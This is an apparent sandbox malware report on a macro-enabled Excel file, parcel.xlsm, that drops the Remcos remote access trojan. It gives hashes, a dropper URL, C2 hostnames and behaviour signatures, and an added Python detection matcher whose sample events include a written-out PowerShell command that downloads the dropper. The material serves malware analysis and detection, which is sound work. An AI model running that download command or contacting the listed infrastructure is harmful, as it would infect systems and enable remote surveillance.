General

  • Target

    parcel.xlsm

  • Size

    18KB

  • Sample

    210309-lhd4kcz7nj

  • MD5

    0e1137f6c82bd9f4545156ce8fa1bfb5

  • SHA1

    e784d86a123ff452024780303be372966df32e5a

  • SHA256

    8c38dbbc3834ab600313e6cd32e0e1a077726f002a608b5cbf9baa87ff11f90f

  • SHA512

    ae79c139386eb2fe89f96a2dbfe434a1634d6ffbbca5bf0aa41507cfdaba8c8de140b430e7fc39433751aa17119678418fd4160a3492fb5917cc0b152e943533

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • URLs (deobfuscated)

    exe.dropper: http://adelantosi.com/cp/parcel.exe

Extracted

  • Family

    remcos

  • C2

    calvinlarry3551.hopto.org:2240

    calvinlarry3551.ddns.net:2240

Targets

    • Target

      parcel.xlsm

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Remcos

      Remcos is a commercially sold, closed-source remote control and surveillance tool that is widely abused as a RAT; the extracted C2 configuration above is what ties this sample to the family.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext
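As an added example (not part of this report, and not the sandbox's own detection logic), the indicators and behaviour signatures above turned into a small matcher over Sysmon-style process, DNS and network events. The event records and the PowerShell command line are constructed for illustration; only the dropper URL, the two C2 hostnames, the port and the SHA256 come from the report. The Office-parent and script-interpreter lists are an assumption about what "unexpected child process" covers here, and the SetThreadContext signature (typically seen when a loader hollows a process) is not modelled.

```python
# Added example (not from the sandbox report): match the report's indicators
# and behaviours against Sysmon-style events. Event records and the
# PowerShell command line below are constructed; only the URL, hostnames,
# port and hash are taken from the report.
import hashlib
from typing import Dict, List

# Indicators from the report
DROPPER_URL = "http://adelantosi.com/cp/parcel.exe"
C2_HOSTS = {"calvinlarry3551.hopto.org", "calvinlarry3551.ddns.net"}
C2_PORT = 2240
SAMPLE_SHA256 = "8c38dbbc3834ab600313e6cd32e0e1a077726f002a608b5cbf9baa87ff11f90f"

# "Process spawned unexpected child process": an Office host launching a
# script interpreter is the macro-to-dropper hop the report describes.
# These lists are an assumption about what that signature covers.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe"}


def _basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def sample_hash_matches(data: bytes) -> bool:
    """True if the bytes are the parcel.xlsm sample listed in the report."""
    return hashlib.sha256(data).hexdigest() == SAMPLE_SHA256


def check_event(ev: dict) -> List[str]:
    """Return the name of every indicator or behaviour rule this event trips."""
    hits: List[str] = []
    eid = ev.get("EventID")
    if eid == 1:  # Sysmon process creation
        parent = _basename(ev.get("ParentImage", ""))
        child = _basename(ev.get("Image", ""))
        if parent in OFFICE_PARENTS and child in SCRIPT_CHILDREN:
            hits.append(f"office-spawned-interpreter: {parent} -> {child}")
        if DROPPER_URL.lower() in ev.get("CommandLine", "").lower():
            hits.append("dropper-url-in-commandline")
    elif eid == 22:  # Sysmon DNS query
        name = ev.get("QueryName", "").lower().rstrip(".")
        if name in C2_HOSTS:
            hits.append(f"remcos-c2-dns: {name}")
    elif eid == 3:  # Sysmon network connection
        host = ev.get("DestinationHostname", "").lower().rstrip(".")
        port = int(ev.get("DestinationPort", 0) or 0)
        # The C2 hosts are dynamic-DNS names, so match on name and port
        # rather than on a resolved IP that may change between runs.
        if host in C2_HOSTS and port == C2_PORT:
            hits.append(f"remcos-c2-connect: {host}:{port}")
    return hits


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Map the index of every event with at least one hit to its hit list."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = check_event(ev)
        if hits:
            result[i] = hits
    return result


# Constructed events mirroring the chain in the report: Excel -> PowerShell
# fetching the dropper, the dropped EXE running, then Remcos resolving and
# connecting to its C2, plus one benign connection as a control.
EVENTS = [
    {"EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://adelantosi.com/cp/parcel.exe',"
                    "'C:\\Users\\Public\\parcel.exe')\""},
    {"EventID": 1,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\Public\parcel.exe",
     "CommandLine": r"C:\Users\Public\parcel.exe"},
    {"EventID": 22, "Image": r"C:\Users\Public\parcel.exe",
     "QueryName": "calvinlarry3551.hopto.org"},
    {"EventID": 3, "Image": r"C:\Users\Public\parcel.exe",
     "DestinationHostname": "calvinlarry3551.ddns.net",
     "DestinationPort": "2240"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "www.example.com", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for idx, hits in scan(EVENTS).items():
        print(idx, hits)
```

The matcher deliberately keys the C2 rule on hostname and port rather than IP: both C2 entries are dynamic-DNS names, so the address seen in one detonation says little about the next, while the name and the non-standard port 2240 are what the extracted config actually pins down.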

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion

    Modify Registry (T1112), 1 hit

  • Discovery

    System Information Discovery (T1082), 3 hits

    Query Registry (T1012), 2 hits

Tasks